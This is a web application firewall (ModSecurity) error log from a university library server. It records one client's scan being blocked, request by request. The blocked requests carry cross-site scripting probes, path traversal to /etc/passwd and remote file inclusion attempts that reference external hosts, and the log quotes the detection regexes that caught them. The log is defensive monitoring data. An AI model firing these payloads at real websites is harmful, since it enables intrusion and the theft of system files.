[Tue Aug 29 11:55:17.127828 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:note. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:note: </textarea><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/payform.php"] [unique_id "ZO16NcCo-f0AAAqsV40AAAAB"]
[Tue Aug 29 11:55:17.654889 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/flexible-custom-post-type/edit-post.php"] [unique_id "ZO16NcCo-f0AAAqY6CwAAAAr"]
[Tue Aug 29 11:55:17.715962 2023] [:error] [pid 2735] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/tiki-featured_link.php"] [unique_id "ZO16NcCo-f0AAAqvjm8AAAAE"]
[Tue Aug 29 11:55:18.678974 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:msg: &#<svg/onload=alert(1337)>;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/message"] [unique_id "ZO16NsCo-f0AAAqeFTgAAAAx"]
[Tue Aug 29 11:55:19.753107 2023] [:error] [pid 2736] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xd9\\x88\\xd8\\xb1\\xd9\\x88\\xd8\\xaf found within ARGS:wp-submit: \\xd9\\x88\\xd8\\xb1\\xd9\\x88\\xd8\\xaf"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16N8Co-f0AAAqw51YAAAAH"]
[Tue Aug 29 11:55:19.796984 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:errmsg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -->< found within ARGS:errmsg: ABABAB--><script>alert(1337)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/remote/error"] [unique_id "ZO16N8Co-f0AAAqSwsEAAAAN"]
[Tue Aug 29 11:55:20.615630 2023] [:error] [pid 2736] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:playlist. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:playlist: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/hdw-tube/playlist.php"] [unique_id "ZO16OMCo-f0AAAqw51wAAAAH"]
[Tue Aug 29 11:55:22.533539 2023] [:error] [pid 2736] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:q: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/templates/m/inc_head.php"] [unique_id "ZO16OsCo-f0AAAqw52MAAAAH"]
[Tue Aug 29 11:55:22.713736 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO16OsCo-f0AAApbUf4AAAAh"]
[Tue Aug 29 11:55:23.913301 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:url: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/wp-custom-pages/wp-download.php"] [unique_id "ZO16O8Co-f0AAAolKnQAAAAe"]
[Tue Aug 29 11:55:23.956413 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:log: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/webadmin/reporter/view_server_log.php"] [unique_id "ZO16O8Co-f0AAApa-OYAAAAg"]
[Tue Aug 29 11:55:24.011461 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/atmail/"] [unique_id "ZO16PMCo-f0AAAqeFVcAAAAx"]
[Tue Aug 29 11:55:24.539977 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/atmail/webmail/"] [unique_id "ZO16PMCo-f0AAApa-OoAAAAg"]
[Tue Aug 29 11:55:24.680569 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:operation. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:operation: 11111111</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet"] [unique_id "ZO16PMCo-f0AAApa-PAAAAAg"]
[Tue Aug 29 11:55:25.758677 2023] [:error] [pid 2560] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:language: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/webmail/"] [unique_id "ZO16PcCo-f0AAAoAlAUAAAAC"]
[Tue Aug 29 11:55:25.813292 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:fccc'\\\\"><svg/onload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: < found within ARGS_NAMES:fccc'\\x5c\\x5c\\x22><svg/onload: fccc'\\x5c\\x22><svg/onload"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/webapp/"] [unique_id "ZO16PcCo-f0AAAoz8FgAAAAS"]
[Tue Aug 29 11:55:26.617083 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:q: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/search/"] [unique_id "ZO16PsCo-f0AAAqSwtgAAAAN"]
[Tue Aug 29 11:55:28.567549 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../ found within ARGS:type: ../../../../../../../../../../../etc/./passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/horde/util/barcode.php"] [unique_id "ZO16QMCo-f0AAAolKpcAAAAe"]
[Tue Aug 29 11:55:29.898079 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:layout: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/badging/badge_template_v0.php"] [unique_id "ZO16QcCo-f0AAAqSwuAAAAAN"]
[Tue Aug 29 11:55:30.545790 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php"] [unique_id "ZO16QsCo-f0AAAqqtgwAAAAA"]
[Tue Aug 29 11:55:30.721670 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16QsCo-f0AAApXgrgAAAAU"]
[Tue Aug 29 11:55:31.596719 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://evil.com found within TX:1: evil.com"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/html/common/forward_js.jsp"] [unique_id "ZO16Q8Co-f0AAAoz8HEAAAAS"]
[Tue Aug 29 11:55:32.613752 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:login-error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:login-error: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16RMCo-f0AAAqSwukAAAAN"]
[Tue Aug 29 11:55:33.861189 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:query: <script>alert(document.domain);</script>=or"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/pmb/admin/convert/export_z3950.php"] [unique_id "ZO16RcCo-f0AAApXgsQAAAAU"]
[Tue Aug 29 11:55:35.832763 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:include_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:include_file: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16R8Co-f0AAAqTvt8AAAAa"]
[Tue Aug 29 11:55:36.108399 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:key: <img src onerror=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/vendor/curl/curl/tests/server/php-curl-test/post_file_path_upload.php"] [unique_id "ZO16SMCo-f0AAAq3a5AAAAAI"]
[Tue Aug 29 11:55:36.644499 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16SMCo-f0AAAqTvuwAAAAa"]
[Tue Aug 29 11:55:37.936284 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/labkey/__r1/login-login.view"] [unique_id "ZO16ScCo-f0AAApHRjsAAAAP"]
[Tue Aug 29 11:55:38.167420 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:prod. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;// found within ARGS:prod: ';prompt`document.domain`;//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/gsearch.php.en"] [unique_id "ZO16SsCo-f0AAAqTvvUAAAAa"]
